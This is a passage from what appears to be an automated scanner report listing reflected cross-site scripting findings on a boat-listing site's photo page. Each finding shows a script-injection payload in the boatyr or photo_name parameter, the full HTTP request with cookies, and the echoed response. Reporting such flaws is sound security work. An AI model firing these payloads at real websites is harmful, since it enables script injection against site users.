ted-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:33:13 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 23 Sep 2010 17:00:28 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<title> 32' 32 Regulator WITH TRAILER **REDUCED**f3c24</title><script>alert(1)</script>434c56e2e6b Photo 1 photo</title>
...[SNIP]...

3.407. http://www.yachtworld.com/core/listing/displayPhoto.jsp [boatyr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/displayPhoto.jsp

Issue detail

The value of the boatyr request parameter is copied into the HTML document as text between TITLE tags. The payload 69485</title><script>alert(1)</script>d1da9f3582d was submitted in the boatyr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/displayPhoto.jsp?ybw=&boat_id=2266476&boatyr=200669485</title><script>alert(1)</script>d1da9f3582d&boatname=32%27+32+Regulator+WITH+TRAILER+**REDUCED**&photo_revised_date=1285261228000&photo_name=Photo+2&photo=2&back=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:33:35 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 23 Sep 2010 17:00:28 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<title>200669485</title><script>alert(1)</script>d1da9f3582d 32' 32 Regulator WITH TRAILER **REDUCED** Photo 2 photo</title>
...[SNIP]...

3.408. http://www.yachtworld.com/core/listing/displayPhoto.jsp [boatyr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/displayPhoto.jsp

Issue detail

The value of the boatyr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df26d"><script>alert(1)</script>f8db49b05ea was submitted in the boatyr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/displayPhoto.jsp?ybw=&boat_id=2266476&boatyr=2006df26d"><script>alert(1)</script>f8db49b05ea&boatname=32%27+32+Regulator+WITH+TRAILER+**REDUCED**&photo_revised_date=1285261228000&photo_name=Photo+2&photo=2&back=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:33:27 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 23 Sep 2010 17:00:28 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<meta name="keywords" content="2006df26d"><script>alert(1)</script>f8db49b05ea, 32' 32 Regulator WITH TRAILER **REDUCED**, Photo 2, boat photos, yacht photos, photo gallery, view photos, boat pictures, yacht pictures"/>
...[SNIP]...

3.409. http://www.yachtworld.com/core/listing/displayPhoto.jsp [photo_name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/displayPhoto.jsp

Issue detail

The value of the photo_name request parameter is copied into the HTML document as plain text between tags. The payload 76d4a<script>alert(1)</script>c42f2171b1f was submitted in the photo_name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/displayPhoto.jsp?boat_id=2266476&boatname=32%27+32+Regulator+WITH+TRAILER+**REDUCED**&photo_revised_date=1285261228000&photo_name=Photo+176d4a<script>alert(1)</script>c42f2171b1f&photo=1&url=&back=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:33:51 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 23 Sep 2010 17:00:28 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<p>Photo 176d4a<script>alert(1)</script>c42f2171b1f</p>
...[SNIP]...

3.410. http://www.yachtworld.com/core/listing/displayPhoto.jsp [photo_name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/displayPhoto.jsp

Issue detail

The value of the photo_name request parameter is copied into the HTML document as text between TITLE tags. The payload 2d7fa</title><script>alert(1)</script>6709c510f8f was submitted in the photo_name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/displayPhoto.jsp?boat_id=2266476&boatname=32%27+32+Regulator+WITH+TRAILER+**REDUCED**&photo_revised_date=1285261228000&photo_name=Photo+12d7fa</title><script>alert(1)</script>6709c510f8f&photo=1&url=&back=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:33:54 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 23 Sep 2010 17:00:28 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<title> 32' 32 Regulator WITH TRAILER **REDUCED** Photo 12d7fa</title><script>alert(1)</script>6709c510f8f photo</title>
...[SNIP]...

3.411. http://www.yachtworld.com/core/listing/displayPhoto.jsp [photo_name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/displayPhoto.jsp

Issue detail

The value of the photo_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f88f"><script>alert(1)</script>d37390a732d was submitted in the photo_name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/displayPhoto.jsp?boat_id=2266476&boatname=32%27+32+Regulator+WITH+TRAILER+**REDUCED**&photo_revised_date=1285261228000&photo_name=Photo+11f88f"><script>alert(1)</script>d37390a732d&photo=1&url=&back=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 